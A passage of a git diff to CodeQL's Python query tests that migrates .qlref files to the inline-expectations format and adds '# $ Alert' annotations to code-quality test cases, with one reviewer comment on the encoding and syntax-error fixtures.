3 +- .../Statements/no_effect/assert_raises.py | 4 +- .../query-tests/Statements/no_effect/test.py | 12 +- .../unreachable/UnreachableCode.qlref | 3 +- .../Statements/unreachable/test.py | 12 +- .../UnreachableCode.qlref | 3 +- .../query-tests/Testing/ImpreciseAssert.qlref | 3 +- python/ql/test/query-tests/Testing/test.py | 8 +- .../Variables/general/Global.qlref | 3 +- 
.../general/GlobalAtModuleLevel.qlref | 3 +- .../Variables/general/ShadowBuiltin.qlref | 3 +- .../Variables/general/ShadowGlobal.qlref | 3 +- .../Variables/general/variables_test.py | 8 +- .../Variables/multiple/MultiplyDefined.qlref | 3 +- .../Variables/multiple/uselesscode_test.py | 12 +- .../Variables/undefined/UndefinedExport.qlref | 3 +- .../Variables/undefined/UndefinedGlobal.py | 8 +- .../Variables/undefined/UndefinedGlobal.qlref | 3 +- .../Variables/undefined/UninitializedLocal.py | 30 +-- .../undefined/UninitializedLocal.qlref | 3 +- .../Variables/undefined/decorated_exports.py | 6 +- .../Variables/undefined/exports.py | 2 +- .../Variables/undefined/odasa3987.py | 2 +- ...uspiciousUnusedLoopIterationVariable.qlref | 3 +- .../unused/UnusedLocalVariable.qlref | 3 +- .../unused/UnusedModuleVariable.qlref | 3 +- .../Variables/unused/UnusedParameter.qlref | 3 +- .../test/query-tests/Variables/unused/test.py | 10 +- .../Variables/unused/variables_test.py | 18 +- .../UnusedLocalVariable.qlref | 3 +- .../unused_local_nonlocal/variables_test.py | 2 +- .../analysis/Consistency/Consistency.qlref | 2 +- .../analysis/jump_to_defn/Definitions.qlref | 2 +- .../analysis/pointsto/FailedInference.qlref | 2 +- .../pointsto/KeyPointsToFailure.qlref | 3 +- .../analysis/pointsto/Pruned.qlref | 2 +- .../suppression/AlertSuppression.qlref | 2 +- 498 files changed, 1715 insertions(+), 1496 deletions(-) diff --git a/python/ql/test/2/query-tests/Classes/inconsistent-mro/InconsistentMRO.qlref b/python/ql/test/2/query-tests/Classes/inconsistent-mro/InconsistentMRO.qlref index f43176f3d7a8..e2e9a180ab1c 100644 --- a/python/ql/test/2/query-tests/Classes/inconsistent-mro/InconsistentMRO.qlref +++ b/python/ql/test/2/query-tests/Classes/inconsistent-mro/InconsistentMRO.qlref @@ -1 +1,2 @@ -Classes/InconsistentMRO.ql \ No newline at end of file +query: Classes/InconsistentMRO.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql 
diff --git a/python/ql/test/2/query-tests/Classes/inconsistent-mro/inconsistent_mro.py b/python/ql/test/2/query-tests/Classes/inconsistent-mro/inconsistent_mro.py index 346778648349..a8e76c6bfb11 100644 --- a/python/ql/test/2/query-tests/Classes/inconsistent-mro/inconsistent_mro.py +++ b/python/ql/test/2/query-tests/Classes/inconsistent-mro/inconsistent_mro.py @@ -6,7 +6,7 @@ class X(object): class Y(X): pass -class Z(X, Y): +class Z(X, Y): # $ Alert pass class O: diff --git a/python/ql/test/2/query-tests/Classes/new-style/PropertyInOldStyleClass.qlref b/python/ql/test/2/query-tests/Classes/new-style/PropertyInOldStyleClass.qlref index 297295c006e6..fa1947665113 100644 --- a/python/ql/test/2/query-tests/Classes/new-style/PropertyInOldStyleClass.qlref +++ b/python/ql/test/2/query-tests/Classes/new-style/PropertyInOldStyleClass.qlref @@ -1 +1,2 @@ -Classes/PropertyInOldStyleClass.ql +query: Classes/PropertyInOldStyleClass.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/2/query-tests/Classes/new-style/SlotsInOldStyleClass.qlref b/python/ql/test/2/query-tests/Classes/new-style/SlotsInOldStyleClass.qlref index 62fb3202a16f..688f31402ad0 100644 --- a/python/ql/test/2/query-tests/Classes/new-style/SlotsInOldStyleClass.qlref +++ b/python/ql/test/2/query-tests/Classes/new-style/SlotsInOldStyleClass.qlref @@ -1 +1,2 @@ -Classes/SlotsInOldStyleClass.ql \ No newline at end of file +query: Classes/SlotsInOldStyleClass.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/2/query-tests/Classes/new-style/SuperInOldStyleClass.qlref b/python/ql/test/2/query-tests/Classes/new-style/SuperInOldStyleClass.qlref index 08f737893eff..293fc72d86ca 100644 --- a/python/ql/test/2/query-tests/Classes/new-style/SuperInOldStyleClass.qlref +++ b/python/ql/test/2/query-tests/Classes/new-style/SuperInOldStyleClass.qlref 
@@ -1 +1,2 @@ -Classes/SuperInOldStyleClass.ql \ No newline at end of file +query: Classes/SuperInOldStyleClass.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/2/query-tests/Classes/new-style/newstyle_test.py b/python/ql/test/2/query-tests/Classes/new-style/newstyle_test.py index f1e3ea8e42c8..44dce333ef90 100644 --- a/python/ql/test/2/query-tests/Classes/new-style/newstyle_test.py +++ b/python/ql/test/2/query-tests/Classes/new-style/newstyle_test.py @@ -1,7 +1,7 @@ #Only works for Python2 -class OldStyle1: +class OldStyle1: # $ Alert[py/slots-in-old-style-class] __slots__ = [ 'a', 'b' ] @@ -12,7 +12,7 @@ def __init__(self, a, b): class OldStyle2: def __init__(self, x): - super().__init__(x) + super().__init__(x) # $ Alert[py/super-in-old-style] class NewStyle1(object): diff --git a/python/ql/test/2/query-tests/Classes/new-style/property_old_style.py b/python/ql/test/2/query-tests/Classes/new-style/property_old_style.py index 8291feab26c1..0b529d9edb7e 100644 --- a/python/ql/test/2/query-tests/Classes/new-style/property_old_style.py +++ b/python/ql/test/2/query-tests/Classes/new-style/property_old_style.py @@ -5,6 +5,6 @@ class OldStyle: def __init__(self, x): self._x = x - @property + @property # $ Alert[py/property-in-old-style-class] def piosc(self): return self._x \ No newline at end of file diff --git a/python/ql/test/2/query-tests/Classes/undefined-attribute/MaybeUndefinedClassAttribute.qlref b/python/ql/test/2/query-tests/Classes/undefined-attribute/MaybeUndefinedClassAttribute.qlref index d4986ffc84ce..35f6da7add55 100644 --- a/python/ql/test/2/query-tests/Classes/undefined-attribute/MaybeUndefinedClassAttribute.qlref +++ b/python/ql/test/2/query-tests/Classes/undefined-attribute/MaybeUndefinedClassAttribute.qlref @@ -1 +1,2 @@ -Classes/MaybeUndefinedClassAttribute.ql +query: Classes/MaybeUndefinedClassAttribute.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql 
diff --git a/python/ql/test/2/query-tests/Classes/undefined-attribute/UndefinedClassAttribute.qlref b/python/ql/test/2/query-tests/Classes/undefined-attribute/UndefinedClassAttribute.qlref
index 7ac0a3b18b77..f0e8fb722784 100644
--- a/python/ql/test/2/query-tests/Classes/undefined-attribute/UndefinedClassAttribute.qlref
+++ b/python/ql/test/2/query-tests/Classes/undefined-attribute/UndefinedClassAttribute.qlref
@@ -1 +1,2 @@
-Classes/UndefinedClassAttribute.ql
+query: Classes/UndefinedClassAttribute.ql
+postprocess: utils/test/InlineExpectationsTestQuery.ql
diff --git a/python/ql/test/2/query-tests/Exceptions/general/CatchingBaseException.qlref b/python/ql/test/2/query-tests/Exceptions/general/CatchingBaseException.qlref
index 5588dbf2c7b4..33b4697e7ef7 100644
--- a/python/ql/test/2/query-tests/Exceptions/general/CatchingBaseException.qlref
+++ b/python/ql/test/2/query-tests/Exceptions/general/CatchingBaseException.qlref
@@ -1 +1,2 @@
-Exceptions/CatchingBaseException.ql
\ No newline at end of file
+query: Exceptions/CatchingBaseException.ql
+postprocess: utils/test/InlineExpectationsTestQuery.ql
diff --git a/python/ql/test/2/query-tests/Exceptions/general/EmptyExcept.qlref b/python/ql/test/2/query-tests/Exceptions/general/EmptyExcept.qlref
index 3f4987046b12..7a046d008cd2 100644
--- a/python/ql/test/2/query-tests/Exceptions/general/EmptyExcept.qlref
+++ b/python/ql/test/2/query-tests/Exceptions/general/EmptyExcept.qlref
@@ -1 +1,2 @@
-Exceptions/EmptyExcept.ql
\ No newline at end of file
+query: Exceptions/EmptyExcept.ql
+postprocess: utils/test/InlineExpectationsTestQuery.ql
diff --git a/python/ql/test/2/query-tests/Exceptions/general/IllegalExceptionHandlerType.qlref b/python/ql/test/2/query-tests/Exceptions/general/IllegalExceptionHandlerType.qlref
index 6d49710a7599..7a7911ca4403 100644
--- a/python/ql/test/2/query-tests/Exceptions/general/IllegalExceptionHandlerType.qlref
+++ b/python/ql/test/2/query-tests/Exceptions/general/IllegalExceptionHandlerType.qlref
@@ -1 +1,2 @@ -Exceptions/IllegalExceptionHandlerType.ql \ No newline at end of file +query: Exceptions/IllegalExceptionHandlerType.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/2/query-tests/Exceptions/general/IllegalRaise.qlref b/python/ql/test/2/query-tests/Exceptions/general/IllegalRaise.qlref index 5a515d5656d3..2bee772260a9 100644 --- a/python/ql/test/2/query-tests/Exceptions/general/IllegalRaise.qlref +++ b/python/ql/test/2/query-tests/Exceptions/general/IllegalRaise.qlref @@ -1 +1,2 @@ -Exceptions/IllegalRaise.ql \ No newline at end of file +query: Exceptions/IllegalRaise.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/2/query-tests/Exceptions/general/IncorrectExceptOrder.qlref b/python/ql/test/2/query-tests/Exceptions/general/IncorrectExceptOrder.qlref index bc4c3a070813..f4278558baae 100644 --- a/python/ql/test/2/query-tests/Exceptions/general/IncorrectExceptOrder.qlref +++ b/python/ql/test/2/query-tests/Exceptions/general/IncorrectExceptOrder.qlref @@ -1 +1,2 @@ -Exceptions/IncorrectExceptOrder.ql +query: Exceptions/IncorrectExceptOrder.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/2/query-tests/Exceptions/general/exceptions_test.py b/python/ql/test/2/query-tests/Exceptions/general/exceptions_test.py index 6e82bc028906..023b490eaaea 100644 --- a/python/ql/test/2/query-tests/Exceptions/general/exceptions_test.py +++ b/python/ql/test/2/query-tests/Exceptions/general/exceptions_test.py @@ -14,4 +14,4 @@ def raise_tuple(cond): raise (Exception, "bananas", 17) else: #This is an error - raise (17, "bananas", Exception) + raise (17, "bananas", Exception) # $ Alert[py/illegal-raise] diff --git a/python/ql/test/2/query-tests/Exceptions/generators/UnguardedNextInGenerator.qlref b/python/ql/test/2/query-tests/Exceptions/generators/UnguardedNextInGenerator.qlref index 7fe5d609705b..f174a4a96f57 100644 
--- a/python/ql/test/2/query-tests/Exceptions/generators/UnguardedNextInGenerator.qlref +++ b/python/ql/test/2/query-tests/Exceptions/generators/UnguardedNextInGenerator.qlref @@ -1 +1,2 @@ -Exceptions/UnguardedNextInGenerator.ql \ No newline at end of file +query: Exceptions/UnguardedNextInGenerator.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/2/query-tests/Exceptions/generators/test.py b/python/ql/test/2/query-tests/Exceptions/generators/test.py index e8b3f0b2b344..0c5ca29f798a 100644 --- a/python/ql/test/2/query-tests/Exceptions/generators/test.py +++ b/python/ql/test/2/query-tests/Exceptions/generators/test.py @@ -2,12 +2,12 @@ def bad1(it): while True: - yield next(it) + yield next(it) # $ Alert def bad2(seq): it = iter(seq) #Not OK as seq may be empty - raise KeyError(next(it)) + raise KeyError(next(it)) # $ Alert yield 0 def ok1(seq): diff --git a/python/ql/test/2/query-tests/Exceptions/raising/RaisingTuple.qlref b/python/ql/test/2/query-tests/Exceptions/raising/RaisingTuple.qlref index 55d1f5e1d4f9..1cefef85d8a5 100644 --- a/python/ql/test/2/query-tests/Exceptions/raising/RaisingTuple.qlref +++ b/python/ql/test/2/query-tests/Exceptions/raising/RaisingTuple.qlref @@ -1 +1,2 @@ -Exceptions/RaisingTuple.ql +query: Exceptions/RaisingTuple.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/2/query-tests/Exceptions/raising/test.py b/python/ql/test/2/query-tests/Exceptions/raising/test.py index ff991f642e2f..1e5f3cb35fca 100644 --- a/python/ql/test/2/query-tests/Exceptions/raising/test.py +++ b/python/ql/test/2/query-tests/Exceptions/raising/test.py @@ -5,11 +5,11 @@ def ok(): def bad1(): ex = Exception, "message" - raise ex + raise ex # $ Alert def bad2(): - raise (Exception, "message") + raise (Exception, "message") # $ Alert def bad3(): ex = Exception, - raise ex, "message" + raise ex, "message" # $ Alert 
diff --git a/python/ql/test/2/query-tests/Expressions/TruncatedDivision.qlref b/python/ql/test/2/query-tests/Expressions/TruncatedDivision.qlref index fa2c2cbf006c..17d539c32260 100644 --- a/python/ql/test/2/query-tests/Expressions/TruncatedDivision.qlref +++ b/python/ql/test/2/query-tests/Expressions/TruncatedDivision.qlref @@ -1 +1,2 @@ -Expressions/TruncatedDivision.ql +query: Expressions/TruncatedDivision.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/2/query-tests/Expressions/TruncatedDivision_test.py b/python/ql/test/2/query-tests/Expressions/TruncatedDivision_test.py index 6f265b824fb7..64ef262edb81 100644 --- a/python/ql/test/2/query-tests/Expressions/TruncatedDivision_test.py +++ b/python/ql/test/2/query-tests/Expressions/TruncatedDivision_test.py @@ -62,14 +62,14 @@ def halve(x): # This case is bad, and is a minimal obvious case that should be bad. It # SHOULD be found by the query. -print(3 / 2) +print(3 / 2) # $ Alert[py/truncated-division] # This case is bad. It uses indirect returns of integers through function calls # to produce the problem. I -print(return_three() / return_two()) +print(return_three() / return_two()) # $ Alert[py/truncated-division] diff --git a/python/ql/test/2/query-tests/Expressions/UseofApply.py b/python/ql/test/2/query-tests/Expressions/UseofApply.py index 9109636f99ec..6c2255012e6c 100644 --- a/python/ql/test/2/query-tests/Expressions/UseofApply.py +++ b/python/ql/test/2/query-tests/Expressions/UseofApply.py @@ -16,7 +16,7 @@ def foo(): # This use of `apply` is a reference to the builtin function and so SHOULD be # caught by the query. - apply(foo, [1]) + apply(foo, [1]) # $ Alert[py/use-of-apply] diff --git a/python/ql/test/2/query-tests/Expressions/UseofApply.qlref b/python/ql/test/2/query-tests/Expressions/UseofApply.qlref index abf684e3918a..4add79acdb3c 100644 --- a/python/ql/test/2/query-tests/Expressions/UseofApply.qlref 
+++ b/python/ql/test/2/query-tests/Expressions/UseofApply.qlref @@ -1 +1,2 @@ -Expressions/UseofApply.ql +query: Expressions/UseofApply.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/2/query-tests/Expressions/UseofInput.qlref b/python/ql/test/2/query-tests/Expressions/UseofInput.qlref index 3f9590f48b2c..2684126de5ee 100644 --- a/python/ql/test/2/query-tests/Expressions/UseofInput.qlref +++ b/python/ql/test/2/query-tests/Expressions/UseofInput.qlref @@ -1 +1,2 @@ -Expressions/UseofInput.ql \ No newline at end of file +query: Expressions/UseofInput.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/2/query-tests/Expressions/expressions_test.py b/python/ql/test/2/query-tests/Expressions/expressions_test.py index c31681e35353..5d6c1b89904f 100644 --- a/python/ql/test/2/query-tests/Expressions/expressions_test.py +++ b/python/ql/test/2/query-tests/Expressions/expressions_test.py @@ -1,9 +1,9 @@ def use_of_apply(func, args): - apply(func, args) + apply(func, args) # $ Alert[py/use-of-apply] def use_of_input(): - return input() # NOT OK + return input() # NOT OK # $ Alert[py/use-of-input] def not_use_of_input(): diff --git a/python/ql/test/2/query-tests/Functions/DeprecatedSliceMethod.qlref b/python/ql/test/2/query-tests/Functions/DeprecatedSliceMethod.qlref index c38b8d1f7619..3043411c1ce4 100644 --- a/python/ql/test/2/query-tests/Functions/DeprecatedSliceMethod.qlref +++ b/python/ql/test/2/query-tests/Functions/DeprecatedSliceMethod.qlref @@ -1 +1,2 @@ -Functions/DeprecatedSliceMethod.ql \ No newline at end of file +query: Functions/DeprecatedSliceMethod.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/2/query-tests/Imports/encoding_error/EncodingError.qlref b/python/ql/test/2/query-tests/Imports/encoding_error/EncodingError.qlref index a7e91769ded1..bc78d28db329 100644 --- a/python/ql/test/2/query-tests/Imports/encoding_error/EncodingError.qlref 
+++ b/python/ql/test/2/query-tests/Imports/encoding_error/EncodingError.qlref @@ -1 +1,2 @@ -Imports/EncodingError.ql +query: Imports/EncodingError.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/2/query-tests/Imports/syntax_error/EncodingError.qlref b/python/ql/test/2/query-tests/Imports/syntax_error/EncodingError.qlref index e742356f8658..bc78d28db329 100644 --- a/python/ql/test/2/query-tests/Imports/syntax_error/EncodingError.qlref +++ b/python/ql/test/2/query-tests/Imports/syntax_error/EncodingError.qlref @@ -1 +1,2 @@ -Imports/EncodingError.ql \ No newline at end of file +query: Imports/EncodingError.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/2/query-tests/Imports/syntax_error/SyntaxError.qlref b/python/ql/test/2/query-tests/Imports/syntax_error/SyntaxError.qlref index c143a01fe8b3..5d0698be3de5 100644 --- a/python/ql/test/2/query-tests/Imports/syntax_error/SyntaxError.qlref +++ b/python/ql/test/2/query-tests/Imports/syntax_error/SyntaxError.qlref @@ -1 +1,2 @@ -Imports/SyntaxError.ql \ No newline at end of file +query: Imports/SyntaxError.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/2/query-tests/Imports/syntax_error/bad_encoding.py b/python/ql/test/2/query-tests/Imports/syntax_error/bad_encoding.py index 9c61b1e1b114..5e3308df0f57 100644 --- a/python/ql/test/2/query-tests/Imports/syntax_error/bad_encoding.py +++ b/python/ql/test/2/query-tests/Imports/syntax_error/bad_encoding.py @@ -8,5 +8,5 @@ # encoding:shift-jis def f(): - print "Python ‚ÌŠJ”­‚ÍA1990 ”N‚²‚ë‚©‚çŠJŽn‚³‚ê‚Ä‚¢‚Ü‚·" + print "Python ‚ÌŠJ”­‚ÍA1990 ”N‚²‚ë‚©‚çŠJŽn‚³‚ê‚Ä‚¢‚Ü‚·" # $ Alert[py/encoding-error] """ diff --git a/python/ql/test/2/query-tests/Imports/syntax_error/nonsense.py b/python/ql/test/2/query-tests/Imports/syntax_error/nonsense.py index e413967af412..f5cd27b313b6 100644 --- a/python/ql/test/2/query-tests/Imports/syntax_error/nonsense.py 
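Review bot: The `# $ Alert[py/encoding-error]` comment appended to the `print` line of `bad_encoding.py` lands in a file that is deliberately mis-encoded, and the `# $ Alert[py/syntax-error]` comment added to line 1 of `nonsense.py` in the next hunk lands in a file that deliberately fails to parse. Nothing visible in the patch shows that `InlineExpectationsTestQuery.ql` can read comments out of a file the extractor cannot decode or parse, so it is worth confirming that each of these expectations is actually matched against the reported alert location. For `bad_encoding.py` the closing `"""` context line suggests the annotated line sits inside a string literal, where a trailing `#` would presumably not be a comment at all. It is also worth checking that the edit preserved the original bytes under the `# encoding:shift-jis` declaration, since a re-encode on save would remove the condition the test exists to exercise.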
+++ b/python/ql/test/2/query-tests/Imports/syntax_error/nonsense.py @@ -1,4 +1,4 @@ -`Twas brillig, and the slithy toves +`Twas brillig, and the slithy toves # $ Alert[py/syntax-error] Did gyre and gimble in the wabe: All mimsy were the borogoves, And the mome raths outgrabe. diff --git a/python/ql/test/2/query-tests/Lexical/OldOctalLiteral.qlref b/python/ql/test/2/query-tests/Lexical/OldOctalLiteral.qlref index 40040c873d63..e5b4fdfec578 100644 --- a/python/ql/test/2/query-tests/Lexical/OldOctalLiteral.qlref +++ b/python/ql/test/2/query-tests/Lexical/OldOctalLiteral.qlref @@ -1 +1,2 @@ -Lexical/OldOctalLiteral.ql \ No newline at end of file +query: Lexical/OldOctalLiteral.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/2/query-tests/Lexical/lexical_test.py b/python/ql/test/2/query-tests/Lexical/lexical_test.py index 4b82b17cc65f..412c24683d19 100644 --- a/python/ql/test/2/query-tests/Lexical/lexical_test.py +++ b/python/ql/test/2/query-tests/Lexical/lexical_test.py @@ -1,6 +1,6 @@ #Bad Octal literal -017 +017 # $ Alert #Good Octal literal 0o17 #Special case file permissions diff --git a/python/ql/test/2/query-tests/Statements/ExecUsed.qlref b/python/ql/test/2/query-tests/Statements/ExecUsed.qlref index ccff89d6815f..286996305ed1 100644 --- a/python/ql/test/2/query-tests/Statements/ExecUsed.qlref +++ b/python/ql/test/2/query-tests/Statements/ExecUsed.qlref @@ -1 +1,2 @@ -Statements/ExecUsed.ql \ No newline at end of file +query: Statements/ExecUsed.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/2/query-tests/Statements/IterableStringOrSequence.qlref b/python/ql/test/2/query-tests/Statements/IterableStringOrSequence.qlref index e8f1ce1b79ef..c24806ccf305 100644 --- a/python/ql/test/2/query-tests/Statements/IterableStringOrSequence.qlref +++ b/python/ql/test/2/query-tests/Statements/IterableStringOrSequence.qlref 
@@ -1 +1,2 @@ -Statements/IterableStringOrSequence.ql \ No newline at end of file +query: Statements/IterableStringOrSequence.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/2/query-tests/Statements/TopLevelPrint.qlref b/python/ql/test/2/query-tests/Statements/TopLevelPrint.qlref index 8271065261d0..e91717901f3d 100644 --- a/python/ql/test/2/query-tests/Statements/TopLevelPrint.qlref +++ b/python/ql/test/2/query-tests/Statements/TopLevelPrint.qlref @@ -1 +1,2 @@ -Statements/TopLevelPrint.ql \ No newline at end of file +query: Statements/TopLevelPrint.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/2/query-tests/Statements/module.py b/python/ql/test/2/query-tests/Statements/module.py index 0b1f4d26546b..af34eedf0dc3 100644 --- a/python/ql/test/2/query-tests/Statements/module.py +++ b/python/ql/test/2/query-tests/Statements/module.py @@ -1,2 +1,2 @@ #Top level prints in modules are bad -print ("Side effect on import") \ No newline at end of file +print ("Side effect on import") # $ Alert[py/print-during-import] \ No newline at end of file diff --git a/python/ql/test/2/query-tests/Statements/statements_test.py b/python/ql/test/2/query-tests/Statements/statements_test.py index e540608964d2..729b1fd7616e 100644 --- a/python/ql/test/2/query-tests/Statements/statements_test.py +++ b/python/ql/test/2/query-tests/Statements/statements_test.py @@ -2,7 +2,7 @@ def exec_used(val): - exec (val) + exec (val) # $ Alert[py/use-of-exec] #Top level print import module @@ -18,7 +18,7 @@ def f(x): s = u"Hello World" else: s = [ u'Hello', u'World'] - for thing in s: + for thing in s: # $ Alert[py/iteration-string-and-sequence] print (thing) import fake_six diff --git a/python/ql/test/2/query-tests/Summary/LinesOfCode.qlref b/python/ql/test/2/query-tests/Summary/LinesOfCode.qlref index b60eb7917224..d22b10044239 100644 --- a/python/ql/test/2/query-tests/Summary/LinesOfCode.qlref 
+++ b/python/ql/test/2/query-tests/Summary/LinesOfCode.qlref @@ -1 +1 @@ -Summary/LinesOfCode.ql +query: Summary/LinesOfCode.ql diff --git a/python/ql/test/2/query-tests/Summary/LinesOfUserCode.qlref b/python/ql/test/2/query-tests/Summary/LinesOfUserCode.qlref index baaa947e6afa..99a6d1324943 100644 --- a/python/ql/test/2/query-tests/Summary/LinesOfUserCode.qlref +++ b/python/ql/test/2/query-tests/Summary/LinesOfUserCode.qlref @@ -1 +1 @@ -Summary/LinesOfUserCode.ql +query: Summary/LinesOfUserCode.ql diff --git a/python/ql/test/2/query-tests/Variables/LeakyComp/LeakyComp.qlref b/python/ql/test/2/query-tests/Variables/LeakyComp/LeakyComp.qlref index 0f6dd50a2814..6b4ece7f1273 100644 --- a/python/ql/test/2/query-tests/Variables/LeakyComp/LeakyComp.qlref +++ b/python/ql/test/2/query-tests/Variables/LeakyComp/LeakyComp.qlref @@ -1 +1,2 @@ -Variables/LeakingListComprehension.ql \ No newline at end of file +query: Variables/LeakingListComprehension.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/2/query-tests/Variables/LeakyComp/test.py b/python/ql/test/2/query-tests/Variables/LeakyComp/test.py index 0cd6a0d25202..bbb5d33328f8 100644 --- a/python/ql/test/2/query-tests/Variables/LeakyComp/test.py +++ b/python/ql/test/2/query-tests/Variables/LeakyComp/test.py @@ -2,12 +2,12 @@ def undefined_in_3(): [x for x in range(3)] - print(x) + print(x) # $ Alert def different_in_3(): y = 10 [y for y in range(3)] - print(y) + print(y) # $ Alert def ok(): [z for z in range(4)] diff --git a/python/ql/test/2/query-tests/Variables/undefined/UndefinedExport.py b/python/ql/test/2/query-tests/Variables/undefined/UndefinedExport.py index d7ec86a22560..847d0ce4f8ef 100644 --- a/python/ql/test/2/query-tests/Variables/undefined/UndefinedExport.py +++ b/python/ql/test/2/query-tests/Variables/undefined/UndefinedExport.py @@ -1,6 +1,6 @@ -__all__ = [ "x", "y", "z", "module" ] +__all__ = [ "x", "y", "z", "module" ] # $ Alert[py/undefined-export] x = 1 if 0: 
diff --git a/python/ql/test/2/query-tests/Variables/undefined/UndefinedExport.qlref b/python/ql/test/2/query-tests/Variables/undefined/UndefinedExport.qlref
index 3e5d31e47488..d964148077e5 100644
--- a/python/ql/test/2/query-tests/Variables/undefined/UndefinedExport.qlref
+++ b/python/ql/test/2/query-tests/Variables/undefined/UndefinedExport.qlref
@@ -1 +1,2 @@
-Variables/UndefinedExport.ql
+query: Variables/UndefinedExport.ql
+postprocess: utils/test/InlineExpectationsTestQuery.ql
diff --git a/python/ql/test/2/query-tests/Variables/undefined/UndefinedGlobal.qlref b/python/ql/test/2/query-tests/Variables/undefined/UndefinedGlobal.qlref
index ea9f5a038426..e69631e746b9 100644
--- a/python/ql/test/2/query-tests/Variables/undefined/UndefinedGlobal.qlref
+++ b/python/ql/test/2/query-tests/Variables/undefined/UndefinedGlobal.qlref
@@ -1 +1,2 @@
-Variables/UndefinedGlobal.ql
+query: Variables/UndefinedGlobal.ql
+postprocess: utils/test/InlineExpectationsTestQuery.ql
diff --git a/python/ql/test/2/query-tests/Variables/undefined/UninitializedLocal.qlref b/python/ql/test/2/query-tests/Variables/undefined/UninitializedLocal.qlref
index f2d0e603554a..90233ce61888 100644
--- a/python/ql/test/2/query-tests/Variables/undefined/UninitializedLocal.qlref
+++ b/python/ql/test/2/query-tests/Variables/undefined/UninitializedLocal.qlref
@@ -1 +1,2 @@
-Variables/UninitializedLocal.ql
+query: Variables/UninitializedLocal.ql
+postprocess: utils/test/InlineExpectationsTestQuery.ql
diff --git a/python/ql/test/2/query-tests/Variables/undefined/package/__init__.py b/python/ql/test/2/query-tests/Variables/undefined/package/__init__.py
index 85f1f2ac24f4..d0f80d5e8909 100644
--- a/python/ql/test/2/query-tests/Variables/undefined/package/__init__.py
+++ b/python/ql/test/2/query-tests/Variables/undefined/package/__init__.py
@@ -1 +1 @@
-__all__ = [ "module", "not_exists" ]
\ No newline at end of file
+__all__ = [ "module", "not_exists" ] # $ Alert[py/undefined-export]
\ No newline at end of file
diff --git a/python/ql/test/3/query-tests/Classes/equals-attr/DefineEqualsWhenAddingAttributes.qlref b/python/ql/test/3/query-tests/Classes/equals-attr/DefineEqualsWhenAddingAttributes.qlref index e542a6176ad4..f3385f506bf2 100644 --- a/python/ql/test/3/query-tests/Classes/equals-attr/DefineEqualsWhenAddingAttributes.qlref +++ b/python/ql/test/3/query-tests/Classes/equals-attr/DefineEqualsWhenAddingAttributes.qlref @@ -1 +1,2 @@ -Classes/DefineEqualsWhenAddingAttributes.ql \ No newline at end of file +query: Classes/DefineEqualsWhenAddingAttributes.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/3/query-tests/Classes/equals-attr/test.py b/python/ql/test/3/query-tests/Classes/equals-attr/test.py index 0ab18d0ad434..b6f3e0eb3be3 100644 --- a/python/ql/test/3/query-tests/Classes/equals-attr/test.py +++ b/python/ql/test/3/query-tests/Classes/equals-attr/test.py @@ -9,7 +9,7 @@ class RedefineEquals: def __eq__(self, other): return other is "Tuesday" -class C(RedefineEquals): +class C(RedefineEquals): # $ Alert def __init__(self, args): self.a, self.b = args diff --git a/python/ql/test/3/query-tests/Classes/inconsistent-mro/InconsistentMRO.qlref b/python/ql/test/3/query-tests/Classes/inconsistent-mro/InconsistentMRO.qlref index f43176f3d7a8..e2e9a180ab1c 100644 --- a/python/ql/test/3/query-tests/Classes/inconsistent-mro/InconsistentMRO.qlref +++ b/python/ql/test/3/query-tests/Classes/inconsistent-mro/InconsistentMRO.qlref @@ -1 +1,2 @@ -Classes/InconsistentMRO.ql \ No newline at end of file +query: Classes/InconsistentMRO.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/3/query-tests/Classes/inconsistent-mro/inconsistent_mro.py b/python/ql/test/3/query-tests/Classes/inconsistent-mro/inconsistent_mro.py index 346778648349..9cb04f1df97c 100644 --- a/python/ql/test/3/query-tests/Classes/inconsistent-mro/inconsistent_mro.py 
+++ b/python/ql/test/3/query-tests/Classes/inconsistent-mro/inconsistent_mro.py @@ -6,12 +6,12 @@ class X(object): class Y(X): pass -class Z(X, Y): +class Z(X, Y): # $ Alert pass class O: pass #This is OK in Python 2 -class N(object, O): +class N(object, O): # $ Alert pass \ No newline at end of file diff --git a/python/ql/test/3/query-tests/Classes/undefined-attribute/MaybeUndefinedClassAttribute.qlref b/python/ql/test/3/query-tests/Classes/undefined-attribute/MaybeUndefinedClassAttribute.qlref index d4986ffc84ce..35f6da7add55 100644 --- a/python/ql/test/3/query-tests/Classes/undefined-attribute/MaybeUndefinedClassAttribute.qlref +++ b/python/ql/test/3/query-tests/Classes/undefined-attribute/MaybeUndefinedClassAttribute.qlref @@ -1 +1,2 @@ -Classes/MaybeUndefinedClassAttribute.ql +query: Classes/MaybeUndefinedClassAttribute.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/3/query-tests/Classes/undefined-attribute/UndefinedClassAttribute.qlref 